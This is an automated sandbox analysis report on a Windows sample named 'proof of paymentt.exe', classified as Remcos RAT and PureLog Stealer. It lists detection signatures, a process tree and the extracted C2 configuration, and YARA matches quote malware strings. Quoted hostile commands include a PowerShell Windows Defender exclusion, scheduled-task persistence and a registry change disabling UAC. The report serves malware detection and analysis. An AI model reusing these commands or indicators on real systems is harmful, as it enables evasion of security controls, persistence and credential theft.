Edit tour

Windows Analysis Report
proof of paymentt.exe

Overview

General Information

Sample name:	proof of paymentt.exe
Analysis ID:	1435883
MD5:	1edf4ab8bd9f71ada01b5cd4763c555d
SHA1:	33000bdfc8ddf75bf48f788645ecc6c028a23278
SHA256:	1fbac26d1db7fce1f1ddc5c552ab50ac44888d906e355f2a9187544a52cb8c94
Tags:	exeRATRemcosRAT
Infos:

Detection

Remcos, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

proof of paymentt.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

powershell.exe (PID: 2672 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 4756 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 5836 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

proof of paymentt.exe (PID: 6112 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

proof of paymentt.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

proof of paymentt.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\vtvkcyiauscpqjziosjypht" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

proof of paymentt.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\foaddqtciauctxnmgdeaamokiq" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

proof of paymentt.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

proof of paymentt.exe (PID: 7632 cmdline: "C:\Users\user\Desktop\proof of paymentt.exe" /stext "C:\Users\user\AppData\Local\Temp\qqgoejdwwimhddbqpnrbdyitqektl" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

mQpdTSxCjbPop.exe (PID: 4304 cmdline: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

schtasks.exe (PID: 2576 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp7E5F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mQpdTSxCjbPop.exe (PID: 6256 cmdline: "C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe" MD5: 1EDF4AB8BD9F71ADA01B5CD4763C555D)

chrome.exe (PID: 2272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:/// MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2492 --field-trial-handle=2368,i,2695784621935690573,1694609991167006164,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "37.120.235.122:2269:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-F9KCYW", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2044389940.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2041298477.0000000006DA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.2038684853.000000000498E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b770:$a1: Remcos restarted by watchdog! 0x6bce8:$a3: %02i:%02i:%02i:%03i
00000007.00000002.4459314039.0000000002EDF000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.4458667961.0000000001320000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.4458472507.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000009.00000002.2065439154.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2037579032.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.2038684853.0000000003F02000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x183310:$a1: Remcos restarted by watchdog! 0x1a4930:$a1: Remcos restarted by watchdog! 0x183888:$a3: %02i:%02i:%02i:%03i 0x1a4ea8:$a3: %02i:%02i:%02i:%03i
Process Memory Space: proof of paymentt.exe PID: 6500	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: proof of paymentt.exe PID: 6500	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: proof of paymentt.exe PID: 6500	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: proof of paymentt.exe PID: 6500	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x86bf:$a1: Remcos restarted by watchdog! 0x5d24d:$a1: Remcos restarted by watchdog! 0x8c19:$a3: %02i:%02i:%02i:%03i 0x9048:$a3: %02i:%02i:%02i:%03i 0x5d7a7:$a3: %02i:%02i:%02i:%03i 0x5dbd6:$a3: %02i:%02i:%02i:%03i
Process Memory Space: proof of paymentt.exe PID: 6112	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: mQpdTSxCjbPop.exe PID: 4304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: mQpdTSxCjbPop.exe PID: 6256	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: mQpdTSxCjbPop.exe PID: 6256	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: mQpdTSxCjbPop.exe PID: 6256	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xed87:$a1: Remcos restarted by watchdog! 0xf2e1:$a3: %02i:%02i:%02i:%03i 0xf710:$a3: %02i:%02i:%02i:%03i
Process Memory Space: proof of paymentt.exe PID: 7588	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Click to see the 23 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.proof of paymentt.exe.2c69c0c.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proof of paymentt.exe.6da0000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proof of paymentt.exe.2c58f94.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mQpdTSxCjbPop.exe.2f38fa4.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proof of paymentt.exe.6da0000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mQpdTSxCjbPop.exe.2f38fa4.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mQpdTSxCjbPop.exe.2f49c1c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mQpdTSxCjbPop.exe.2f49c1c.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.mQpdTSxCjbPop.exe.2f08824.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proof of paymentt.exe.2c58f94.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.mQpdTSxCjbPop.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.mQpdTSxCjbPop.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.mQpdTSxCjbPop.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
12.2.mQpdTSxCjbPop.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
12.2.mQpdTSxCjbPop.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
12.2.mQpdTSxCjbPop.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
0.2.proof of paymentt.exe.401a868.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.proof of paymentt.exe.401a868.3.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.proof of paymentt.exe.401a868.3.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
0.2.proof of paymentt.exe.401a868.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
0.2.proof of paymentt.exe.401a868.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
0.2.proof of paymentt.exe.498ecc8.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.proof of paymentt.exe.498ecc8.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.proof of paymentt.exe.498ecc8.4.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0.2.proof of paymentt.exe.498ecc8.4.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
0.2.proof of paymentt.exe.498ecc8.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0.2.proof of paymentt.exe.2c28814.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.proof of paymentt.exe.498ecc8.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.proof of paymentt.exe.498ecc8.4.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.proof of paymentt.exe.498ecc8.4.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
0.2.proof of paymentt.exe.498ecc8.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
0.2.proof of paymentt.exe.498ecc8.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
0.2.proof of paymentt.exe.401a868.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.proof of paymentt.exe.401a868.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.proof of paymentt.exe.401a868.3.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x8c0c8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0x8c640:$a3: %02i:%02i:%02i:%03i
